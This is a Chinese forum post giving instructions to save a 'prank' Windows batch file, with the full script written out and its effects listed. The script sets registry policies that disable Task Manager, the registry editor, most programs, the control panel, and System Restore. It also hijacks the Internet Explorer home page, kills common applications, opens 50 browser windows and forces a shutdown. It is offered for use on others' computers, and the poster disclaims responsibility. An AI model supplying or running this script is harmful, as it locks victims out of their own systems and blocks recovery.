|
你还没有登录,登录后可以看到更多精彩内容
您需要 登录 才可以下载或查看,没有账号?新成员注册
×
本帖最后由 陆广龙 于 2017-5-2 13:40 编辑
1.首先一个【新建文本文档】
2.打开,输入以下内容:
@echo off
EG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
restrictrun /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
notraycontextmenu /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewcontextmenu /t reg_dword /d 00000001 /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /V DisableSR /t reg_dword /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoFolderOptions /t REG_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nocontrolpanel /t reg_dword /d 00000001 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.4399.com/ /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.4399.com/ /f
taskkill /f /im thunder.exe
taskkill /f /im QQ.exe
taskkill /f /im QQMusic.exe
taskkill /f /im QQLive.exe
taskkill /f /im Stormtray.exe
taskkill /f /im QvodTerminal.exe
taskkill /f /im QvodPlayer.exe
taskkill /f /im SogouInput.exe
taskkill /f /im iexplore.exe
for /l %%i in (1,1,50) do start IEXPLORE.EXE
Shutdown -s -t 60
3.输入完毕之后,点击【文件】-【另存为】-把【保存类型】改为【所有文件】,把【文件名】改为【恶搞小程序.bat】记住一定要把文件的后缀名加上【bat】。
现在给大家说下,运行之后会有什么后果:【恶搞前看看后果,出了问题楼主概不负责】
1.禁止使用注册表
2.禁止使用任务管理器
3.禁止使用大多数程序
4.禁止任务栏(资源管理器)快捷菜单
5.禁止桌面右键菜单
6.禁止使用系统还原
7.禁用文件夹选项菜单
8.禁止使用控制面版
9.修改主页为4399小游戏网站
10.强制关闭迅雷组件
11.强制关闭QQ组件
12.强制关闭QQ音乐组件
13.强制关闭QQLive组件
14.强制关闭暴风影音组件
15.强制关闭快播组件
16.强制关闭搜狗组件
17.强制关闭浏览器组件
18.自动弹出50个默认主页
19.系统出现60秒倒计时
|
|